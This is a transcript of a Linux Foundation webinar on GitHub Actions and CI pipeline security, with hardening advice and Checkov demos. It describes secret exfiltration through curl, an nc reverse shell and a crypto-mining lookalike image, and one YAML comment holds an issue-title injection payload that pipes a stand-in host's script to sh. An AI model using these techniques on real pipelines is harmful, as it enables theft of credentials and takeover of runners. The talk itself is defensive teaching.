Thank you very much, and many thanks to the Linux Foundation for giving me the stage. Today we're going to talk about CI security best practices by trying to crack some of our CI pipelines, seeing what happens, attempting to gain control of the CI runners, and looking at the end at how we can prevent all of it. My name is Barak Schoster. I work at Palo Alto Networks; I was the CTO and co-founder of Bridgecrew, which is today part of Palo Alto Networks. I live in Israel, so if you ever come to visit, feel free to reach out, and I'm a huge Star Wars fan. So what are we going to work through today? We're going to cover the most popular CI system today, which is GitHub Actions, and we'll talk about what could go wrong: what are the external and internal threats, what are the different attack vectors, and how can we prevent them using open source tools only. Let's start with some background. OWASP maintains a great list of the top 10 issues that every application developer should look at. One of them is broken access control; in the case of CI systems, you might gain access to code, or to hosts running your code, that you shouldn't have access to. Another one is insecure design: if your CI pipeline is misconfigured (which ties into the next OWASP issue, security misconfiguration), you can actually exploit that fact to gain control over code or over more machines. You might have vulnerable and outdated components, and a bunch of security logging and monitoring failures. Misconfiguration is a supply chain risk. How does a misconfiguration look in GitHub? Let's say that your system is built from a database, a web application, and a CDN, and that it is continuously deployed using a platform like GitHub Actions: a set of jobs, chained to a set of events, that deploys your code from the version control system to the running instance in production. So effectively, part of your running application is the supply chain itself: the CI pipeline and the version control system, also called the source control management system. We construct this pipeline, publishing code from the version control system to production, from a set of jobs that run on ephemeral or static hosts we call runners. Each of those jobs runs a set of steps that test the code, package the code, release the code, version the code, in some cases obfuscate the code, and run security analysis. But who watches the watchmen? Who watches the CI pipeline itself? In this talk we'll focus on one CI system, but it's important to say that every CI pipeline has its own caveats. GitHub has written an amazing guide on how to harden workflows, and we're going to walk through some of that guide and see how people who are not following it are making their CI pipelines vulnerable. Workflow files are one flavor of CI pipelines; other famous systems are Jenkins, Bitbucket Pipelines, GitLab CI, CircleCI, and the list goes on. We're just using the most popular one. GitHub workflow files are stored in the .github/workflows directory within a code repository and perform different tasks: build, test, deploy, label a new issue. All of this is covered in the GitHub documentation. The fundamental problems are these. One, someone can commit a new file to your workflows directory and by doing so trigger a new workflow to be executed. Another caveat is that metadata fields can be used for injection attacks.
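To make the injection surface concrete, here is a minimal sketch (the file name is made up) of a workflow that reacts to new issues and interpolates the issue title straight into a shell command; the expression between the curly braces is expanded into the script text before the shell ever runs:

```yaml
# .github/workflows/greet-issue.yml (illustrative example)
name: greet-issue
on:
  issues:
    types: [opened]
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      # DANGEROUS: the title is pasted into the script itself, so a
      # title like:  a"; curl https://evil.example/x | sh; echo "
      # turns into extra shell commands executed by this step.
      - run: echo "New issue: ${{ github.event.issue.title }}"
```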
Similar to SQL injection in the web forms of your web application, you can use user-input fields, like the issue title, the issue description, or the pull request title and description, to inject malicious code, because just like any input form, they can be abused for code injection. And the last thing is that Git, the protocol itself, not just GitHub, does not enforce fine-grained access control by default. Meaning, when I give access to my colleagues, they get the same level of control, whether read or write, across all the files within that code repository. And breaking things up into micro-repositories is not always an easy task for an organization that uses a single repository as its source of truth. So, a few GitHub attack vectors. One of them is injection of code via the PR title or the issue title, and we'll use that to exploit existing workflows. Another: we'll try to push a new workflow and bypass some branch protection rules, like the one making sure that you have code approvers before merging a pull request. And another: we'll try to exploit the workflow files to gain access to the secrets of a production environment, and even take control of the host itself. Let's start with the simple ones. About six months ago we had an attack attempt by a contributor to an open source project whose maintainers team I'm part of. The project is called Checkov. Luckily, to contribute to Checkov you need to pass through branch protection rules that prevent first-time contributors from running workflows, and that require approvers before workflows run. That's because the Checkov maintainers team has taken the steps to harden the workflows. But if you haven't, this is what you'll see when a new contributor tries to contribute a piece of code to your software: an easy button called Approve and run. Now, I'm really tempted to click this button to make the unit tests run. But the documentation says we should inspect proposed changes to ensure we are comfortable with everything in the pull request, and that we should be especially alert to proposed changes in the GitHub workflow files. Why is that? Because if you have access to the workflow files, you might gain access to environment variables, for example the secrets that are required to publish your software to the production environment: access keys to AWS, access keys to your Artifactory, or to PyPI. So, in order not to be tempted to click Approve and run, and in order to have a review process around it, it is recommended to set branch protection rules on the topic of outside collaborators. We would like to require approval for all outside contributors, not just first-timers, but every time. Why? Because if someone collaborated with our team once, it doesn't mean his or her account won't be taken over later, and it doesn't mean they will only do good over time. Let's say I've contributed a code fix to an open source repository fixing a typo, an innocent act, and I really appreciate such contributions. But what happens if my second contribution injects malicious code? That's not something I'd like approved automatically. Let's look at a real attack that was attempted on Checkov.
So, we had an anonymous user called Miong34 trying to submit a pull request to our open source repository, which has more than 200 outside collaborators and more than 10 million downloads. It's a popular open source package, and it is likely that attackers want to gain control over it. What did Miong34 try to do? Instead of using our own build workflow, Miong34 contributed a new build workflow, triggered on every pull request, that printed out the environment variables, including the secrets stored in them. Had it succeeded, Miong34 could have gained access to our PyPI package repository, to the AWS environment where our self-hosted runners live, et cetera. Luckily, we have a bunch of protections to prevent that from happening. The first is making sure that you have approvers who approve running such a workflow, because you don't want the environment variables to be exfiltrated. What else can live in environment variables? AWS secrets. Passwords and connection strings to databases. An attacker can also change the logging level and get values printed even when they are not in the environment variables, learn the location of the code if they gain control over the host, grab the GitHub token and use it to push a code modification that will be deployed to production, and map the network by executing nmap if they control the host itself. For that reason we have environment protection rules, where we say that only a specific job, in a specific context, can access specific secrets. And we can add a rule on top of environment protection rules that requires approval before running any workflow that has access to encrypted data or secrets. Let's see what it looks like. I have here a general flow called deployment. This flow deploys a new version of github.com, and it runs on every push to the main branch, which represents my production environment. So I can create a rule saying that a specific set of environment variables is only accessible within that context. Another thing I can do is remove the usage of long-lived secrets altogether. If I'm using AWS, I can give the different self-hosted runners a role instead of AWS access keys. Using roles and STS, the tokens for accessing AWS are temporary and rotate automatically, so even if they are exfiltrated, they are only valid for a short amount of time. I can also limit that specific role so it can only be used from a specific set of IP addresses, which can be a private range. If the attacker is not coming from the same IP range, they won't be able to use that role and won't be able to take over my AWS environment.
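As a sketch of that role-based approach: on GitHub-hosted runners, one common mechanism (an assumption here, since the talk describes roles in general) is OIDC federation via the aws-actions/configure-aws-credentials action, while on EC2 self-hosted runners an instance profile plays the same part. The role ARN below is hypothetical, and the IAM trust policy on the AWS side is where you would attach an aws:SourceIp condition:

```yaml
# illustrative deploy workflow holding only short-lived credentials
name: deploy
on:
  push:
    branches: [main]
permissions:
  id-token: write   # let the job request GitHub's OIDC token
  contents: read
jobs:
  deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::123456789012:role/ci-deploy  # hypothetical role
          aws-region: us-east-1
      # everything after this step runs with temporary STS credentials
      # that expire on their own; there is no long-lived key to steal
```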
Now, let's start attacking our pipeline. We identified a real repository with a real workflow file that makes the environment vulnerable. In this specific repository there is a website that automatically takes each GitHub issue, takes its title, and programmatically generates a web page from it. What can I do with that? I can inject a phishing attempt: the name of the issue becomes "Session expired, please log in to proceed", pointing at my own malicious website address. The site will automatically generate a new page carrying a phishing attack. I can even make it worse. Searching through GitHub, we found thousands of examples of people doing issue grooming, echoing the issue titles and bodies inside the workflow file itself. What does echoing the issue mean? It means I can get remote code execution by creating a new issue and injecting code into its title. So over here I've put some shell commands into an issue title on a vulnerable workflow, created the issue, and it's running; it might take a few seconds, and it can leak data, for example environment variables. Now, that one was simple: you can always sanitize the issue titles and add input validation wherever your workflow echoes user-controlled fields. But it can get even more complex. How does that work? I create a new workflow, let's say I have access to that workflow, and I put an image in it whose name looks like Nginx (the exact image does not exist anymore, but it did about a year and a half ago). What did it run? That Nginx lookalike actually runs a crypto mining attack, and on every build, on every pull request, the crypto miner runs at the expense of my GitHub runners and produces money for the attacker. How did they do that? They simply published an image named like Nginx that, instead of running the Nginx binary, executes the XMRig binary, a crypto miner. Simple. Another hack that can happen: we have branch protection rules, but when I create a new repository the default is to require only one approval, and that can be bypassed quickly using another GitHub Action. I can create a GitHub Action with a step that authenticates using a GitHub token and hits the approve API. What does that mean? Instead of a human being reviewing my change request, a piece of code auto-approves it using that event and a curl command, and as a result I can skip the branch protection rules. That was possible, but GitHub noticed it, and since early 2022 the default is to not allow GitHub Actions to create and approve pull requests automatically. You should know that you should never check that box, because if you do, people can skip your branch protection rules, and it's super easy and the approval looks the same. Now, another weakness in our specific environment. Every GitHub Actions run has a temporary token, and you can also give your action, or specific steps within the workflow, tokens with more permissions. Every token has a timeout: the GitHub token expires after a maximum of 24 hours, and in a job context it lives at most six hours, so you have a short-lived temporary token that can operate for six hours in total. There is a default access level that is read-only, with which you cannot really do much, and there is another, more permissive default; for forked repositories it is read-only. But even read access gets you the code, the check statuses, the pull requests, et cetera, even the security data itself. And you can create automations that have access to secrets saved within your GitHub repositories. You should always save your GitHub token as a secret and not as a plain environment variable; that way it is masked in the logs when something prints it out.
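Two of those mitigations can be written directly into the workflow file. A minimal sketch: a permissions block that scopes the token down to read-only, and the issue title passed through an environment variable so the shell treats it as data rather than as script text:

```yaml
name: triage
on:
  issues:
    types: [opened]
permissions:
  contents: read   # the GITHUB_TOKEN handed to this workflow is read-only
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - name: Print the title safely
        env:
          TITLE: ${{ github.event.issue.title }}  # passed in by the runner as data
        run: echo "New issue: $TITLE"             # the shell expands a variable, not injected code
```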
Now let's see how we can exploit that too. I have a new workflow file called CI Secrets, triggered on some specific events. It has a set of jobs. The first one is named build. The image is not a known vulnerable image like the Nginx one; it's an approved tool. And it has a bunch of steps: the first one checks out the code, and the second one echoes the secrets from the environment and curls that data out to a bad URL, then sends the environment variables to that same malicious URL. Let's zoom in on it. Here we have it: the curl command to a bad URL. So, what can we do about an over-privileged GitHub token? One: don't grant it to actions from the GitHub Marketplace that you do not trust; only do that for vetted GitHub Actions you have confidence in. Let's see what could happen. Over here I have a GitHub organization with some open source repository, and an attacker thinking: hey, I should look for who's using my marketplace action, called Auto Merge++ or something like that; people do want to auto-merge things in some cases. So the attacker creates a malicious action and publishes it to the internet. It requests an access token, because you do need write access to approve an auto-merge, and the attacker can also inject bad code into the latest version of the existing action. As a result, the attacker gains access to the code repository and to the runners executing the tests over the code. Let's see what it looks like. I'll add a curl command; I'll post all the secrets to a bad URL; I'll even add a sleep, to make it look like the action is simply running for a long time; and I can run nc and open a listening port. Let's do it. So I curled everything out to a webhook.site URL generated for this specific need, I have an auto-approve process on my changes, and I have another server just listening on a specific port. I create a new branch with those changes that curl out the environment secrets. It's running; it might take forever. And there: I gain access to the environment variables and the secrets that the environment had, because they are printed out to the webhook.site page. I can see the Postgres password, the GitHub token, the AWS key, which is a scary thing to see, and another super-secret. Oh no. And from that moment on, I have remote shell access from my listening server into the running host, and I can run commands. The result is a reverse shell, potentially on a self-hosted runner, or on an ephemeral runner like the default Ubuntu runner of GitHub workflows. I can even hide how I did it, because from the runner I can create another commit, editing the Git history and removing this change. So I have access to the runner, and I can remove everything from the Git history. It will still exist in the GitHub audit log, but not in the Git commit log. Kind of funny. We have some time, so let's do another interesting bonus hack. We have our CI runners, like GitHub Actions and Jenkins, et cetera, but there is another family of YAML-like workflows, and one of them is Argo. ArgoCD is a tool used to deploy Kubernetes applications into a running cluster; essentially a CD system. It has a simple YAML format: you have an entrypoint, you have a container that you define, and that's it. Simple, right? Now, we'll use a tool, and I'll explain after this slide how to install it, to understand whether we have any issues within that file.
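The file being described looks roughly like this; a minimal sketch in the Argo Workflows style (the image and names are illustrative, and the entrypoint-plus-container shape is assumed from the description), with, notably, no securityContext:

```yaml
# argo-workflow.yaml (illustrative example)
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: deploy-app-
spec:
  entrypoint: deploy
  templates:
    - name: deploy
      container:
        image: alpine:3.18
        command: [sh, -c, "echo deploying..."]
      # no securityContext anywhere, so the pod can run as root
```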
We pip install checkov, then run Checkov to scan that specific directory with one specific check. This check ensures that no workflow pods run as root, and it turns out I'm failing it. What does that mean? That a user can get root access on the CD worker, the same CD worker that deploys new code from the version control system into the running Kubernetes cluster. Which means that if I inject a bad, malicious package, I can run untrusted code on the host that deploys code to my production. Which means I can get admin access to deploy new code, deploy malicious code, and by that gain access to the production servers and exfiltrate all of the customer data or other sensitive data out of them. Now, how can we prevent that from happening? It's a simple code change. We add a securityContext, we say we do not want to run as root, and we give it a user ID. That's it. Your CD system shouldn't run as root, because there is no reason for it to have root access on the Linux host itself. Now, let's talk about prevention. GitHub publishes its best practices, and it's really a shared responsibility model, similar to the one AWS has: you can ignore the security guides of your version control system, or you can read them and harden your environment. It takes some effort, it's not an easy task, but you should allocate time for it. The full guide is at the link on the slide, but we'll go over some of the common best practices that you should be looking into. One: be careful when adding new contributors; you don't want an external contributor exfiltrating your environment variable data. Turn on branch protection rules, and require at least two approvers for every code change. You can also add branch protection rules that prevent force pushes. You can enforce MFA and SSO as part of your organization and repository protection rules. You can scope secrets down per environment. You shouldn't approve and run workflows unless you're 100% sure they aren't malicious. You can avoid long-lived tokens by using roles, and restrict those roles to specific IP addresses. You can make sure that your code is actually signed by the author who made the change. And you can have a CODEOWNERS file. CODEOWNERS is a specific file that lets you, as a repository maintainer, define who must review code before a change is accepted. Using a CODEOWNERS file, I can enforce a review by my DevOps team before any change to my CI pipelines is accepted, whether it comes from an internal or an external contributor. It's even listed in the security guidelines, and I know that not all of us are doing it, because there are a lot of open source GitHub repositories with no code owners defined. The guidelines also note that people with admin or owner permissions can set up the CODEOWNERS file, and no one else should have the level of access needed to edit it. The people you choose as code owners must have read permission to the repository, which makes sense, and when the code owner is a team, the team must be visible, which also makes sense. The important thing is that it gives you ownership: either you change the code yourself, or you are asked for a review when someone else changes it.
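For example, a minimal CODEOWNERS sketch (the organization and team names are made up) that routes every change to the workflow files through a DevOps team review:

```
# .github/CODEOWNERS (illustrative example)
# Changes to the CI pipeline definitions require a review from
# the (hypothetical) DevOps team before they can be merged.
/.github/workflows/  @example-org/devops-team
```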
Now, how can you discover whether you have all of those best practices implemented within your organization? One amazing open source tool, contributed by the team at Google, is OpenSSF Scorecard. It's free and open source, and it has a bunch of built-in CI checks on top of GitHub. It queries GitHub.com, using the GitHub APIs and a personal access token, and asks: are you using branch protection rules, do you have contributors assigned to the project, do you have SCA scanning, or image scanning too, on your GitHub repository, and are the tokens used within this project read-only, or do you have tokens with write access? It's pretty easy to get started; it's on GitHub under ossf/scorecard, and it also has a marketplace action that you can add to scan your GitHub repository periodically. Another open source tool, which I'm happy to be one of the contributors to, is Checkov. Checkov is really a Swiss army knife that can scan a lot of things. It was originally built to scan infrastructure as code, but it has since expanded to scan version control system configuration, meaning platforms like GitHub and GitLab, and to scan the CI pipelines themselves, to prevent attacks like the pipeline poisoning we've seen today. It has a bunch of built-in checks for all of those systems, and you can add custom checks too. The thing I'd recommend is to download it; it's free, under the Apache 2 license, and it has a lot of external contributors. If you want to contribute, feel free to reach out to me over Twitter, LinkedIn, or any other platform, and I can walk you through the contribution process. But let's see how it works. All right, we have the workflow files I showed when I exfiltrated those GitHub secrets. Let's see what happens when we scan them, after installing Checkov and running checkov -d against the directory of the workflow files. I can see that Checkov said: hey, there is a suspicious use of curl with secrets. Checkov knows how to parse the different steps and analyze whether curl commands are used together with the word secrets, which is a reserved word for something sensitive. Another thing Checkov identified is that we have an echo step printing a title. That is the same vulnerable pattern we saw, because an attacker can inject a curl or wget command that will exfiltrate the issue data and the GitHub token to an external website, for example. And the last thing: Checkov has another feature, behind a feature flag, named image referencing, where it scans every image referenced within the workflow file and identifies whether it carries any known CVEs. With that, you can understand whether you are vulnerable to the same kind of attack as the published fake-Nginx crypto miner. If there is a known CVE in an image that a step runs in, Checkov will identify it too. You can run Checkov as a GitHub Action, and my recommendation is to run it as the first action, even before running tests, even before running a build, because that's the first thing you'd like to check. The first question you want answered is: did someone make a bad change to my workflow file? If they did, I don't want that change to run; I want to stop the build right there. What you get is a set of checks that fail after a few seconds; even if someone tries to sneak a change in, it will break the build, and the malicious code will not run.
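Wiring that in could look like the following sketch, assuming the published bridgecrewio/checkov-action from the marketplace (pin whatever version you have vetted); the scan job runs first, and nothing else starts until it passes:

```yaml
# .github/workflows/ci.yml (illustrative example)
name: ci
on: [push, pull_request]
jobs:
  scan-pipeline:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Scan workflows and IaC with Checkov
        uses: bridgecrewio/checkov-action@master
        with:
          directory: .   # a failing check breaks the build here
  tests:
    needs: scan-pipeline   # tests only run after the scan passes
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: echo "build and test steps go here"
```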
So what does all of this mean? Secure design takes a lot of work, and the default rules, including the default branch protection rules, are not what you would expect from a hardened environment. It takes more, and open source tools like OpenSSF Scorecard, Checkov, and others can help. Another thing you should understand is that misconfigurations are a real risk. You can have your workflow files misconfigured, and you can have your version control system misconfigured in the GitHub console; those are actual vulnerabilities an attacker can use to hurt your organization. The defaults are not secure. The pipeline code is another piece of your application that should be inspected on every change. I don't like writing bugs, but I do it all the time, because that's the nature of writing software, and it's the nature of my colleagues' work too, even though we hold each other to high standards. And we echo things in pipelines because they are hard to debug; if I echo the wrong thing, I can create a major hole in my security posture. Fixing issues in infrastructure as code, and in pipelines, which we can treat as infrastructure as code, pipeline as code, is easy when you use those open source tools like OpenSSF Scorecard and Checkov, and it's easy when you catch them early. And I really recommend reading the GitHub security hardening guide at that specific link. Now, let's try Checkov live and see how it works. Let me open the terminal and change the screen sharing settings. So, we have our terminal here, and in it an example CD file. To understand the issues it has, I'm going to read it; it's the same file we saw in the presentation. It has a Docker image, it has a command; looks pretty simple. What I'm going to do now is run pip install checkov. I've already done that before the presentation, so Checkov is installed over here, and I can check the version; here it is, that's the Checkov version. Now I can run Checkov on the current directory. To do that I use checkov -d. Let's look at the help first: Checkov has a lot of flags, but there is really only one you should remember as a default, not all of those knobs and switches, just -d. That's the only one that matters. So I run checkov -d on the current directory. What it does, if I have a lot of files in the directory, or files referencing other files, is build a graph with all the different connections and identify all the issues Checkov can find in the workflow files. It does the same over infrastructure as code files, image files, et cetera. What you see is the output of failing checks, and we have two issues in my Argo file: one, I'm using the default service account, which is bad; two, I'm not running as a non-root user. To fix that, I'll edit the file with vi, and what I need to add is the security context and the user ID. I'm going to copy a pre-made example and paste it in: I add a securityContext and say that I don't want to run as the root user. Now let's scan again and hope the check passes this time. Here we go: one thing is fixed, running as a non-root user. I still need to fix the service account, but that will wait for another time.
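The pasted fix looks roughly like this (a sketch; the user ID is arbitrary, any non-zero UID works):

```yaml
spec:
  securityContext:
    runAsNonRoot: true   # refuse to start the pod if it would run as root
    runAsUser: 1000      # arbitrary non-root user ID
```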
Now, how can you be even more productive? You can put Checkov in GitHub Actions and run it as a CLI tool, but you can also make it part of your IDE. Checkov has two IDE extensions: one for VS Code and one for the JetBrains stack, so pick whichever you like. How do you get it? Again, this is open source too: type "checkov VS Code" into Google, get to the GitHub repository, it's pretty simple, and install it through the VS Code marketplace just like that. You'll get your code scanned pretty fast, and you'll see the results along with automated code fix suggestions. So, I see that we have a few questions; ah, it was only an internal comment. So, everyone, if you do have open questions, post them in the Q&A section and I'd be happy to answer all of them. Right, I see that we don't have any open questions, so I'm going to let the Linux Foundation take over the Zoom session now. Thank you so much, Barak, for your time today, and thank you, everyone, for joining us. As a reminder, this recording will be on the Linux Foundation YouTube page later today. We hope you join us for future webinars, and have a wonderful day. Thank you, everybody. Oh, you know what, Barak, we did actually just get one question in, if you want to answer it. Yeah, sure. The question was: can you force the use of this tool in every workflow? The answer is yes. One way is to enforce a pre-commit hook across all of your environments and all of your workstations. Another is to add Checkov to all of your workflow files. And if you want to orchestrate a larger solution, you can always use the commercial offering from Palo Alto Networks, which orchestrates this at scale. Checkov is an open source tool used by both individuals and enterprises, but it's easier to scale with a managed solution, so I'd recommend checking that out at bridgecrew.io. Thank you, Robert. Thank you so much, Barak. And let's see, it looks like that was the last question. So thank you again, everyone; check out the recording on our YouTube page, and have a wonderful day.